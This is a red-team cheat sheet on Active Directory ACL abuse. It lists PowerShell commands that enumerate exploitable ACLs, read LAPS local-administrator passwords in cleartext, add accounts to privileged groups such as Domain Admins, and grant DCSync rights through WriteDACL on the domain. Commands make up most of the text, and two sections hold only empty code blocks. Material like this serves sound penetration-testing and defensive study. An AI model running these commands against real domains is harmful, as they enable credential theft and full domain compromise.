ACL Abuse

Enumeration

ADModule
PowerView_Dev
PowerView
1
# Import
2
Import-Module C:\ADModule\Microsoft.ActiveDirectory.Management.dll
3
Import-Module C:\ADModule\ActiveDirectory\ActiveDirectory.psd1
4
​
5
# Get DistinguishedName
6
Get-ADUser -Identity USER
7
​
8
# Find ACLs related to that user
9
(Get-Acl 'AD:\CN=USER,CN=Users,DC=it,DC=gcb,DC=local').Access
Copied!
1
Find-InterestingDomainACL -ResolveGUIDs
Copied!
1
Invoke-ACLScanner -ResolveGUIDs
Copied!

ReadProperty, ExtendedRight over OU / Computer Object

Most likely LAPS. The IdentityReferenceName can read the LAPS password in cleartext for the OU.
LAPS Module
1
# Import module
2
Import-Module C:\AD\Tools\AdmPwd.PS\AdmPwd.PS.psd1
3
​
4
# Find the OUs that can read LAPS passwords
5
Find-AdmPwdExtendedRights -Identity <OU>
6
​
7
# Once we have compromised a user that can read LAPS
8
Get-AdmPwdPassword -ComputerName <targetmachine>
Copied!

WriteProperty | Self-Membership | GenericAll over Group

Can add members to the group
ADModule
PowerView_dev
1
# Add
2
Add-ADGroupMember -Identity "LocalAdmins" -Members USERS
3
​
4
# Check
5
Get-ADGroupMember -Identity "LocalAdmins"
Copied!
1
Add-DomainGroupMember -Identity 'Domain Admins' -Members 'harmj0y'
Copied!

GenericWrite | GenericAll | WriteProperty over Computer Object

Can perform Resource Based Constrained Delegation Attack
1
​
Copied!

GenericAll over User Object

Can reset their password without knowing the old one
1
​
Copied!

WriteDACL over DC

Can give DCSync privs to user
RACE
PowerView3
1
Set-ADACL -SamAccountName USER\DOMAIN DistinguishedName 'DC=techcorp,DC=local' -GUIDRight DCSync -Server techcorp.local -Verbose
Copied!
1
Add-DomainObjectAcl -PrincipalIdentity USER -Rights DCSync
Copied!
​

Resources

Abusing Active Directory ACLs/ACEs
Red Teaming Experiments
​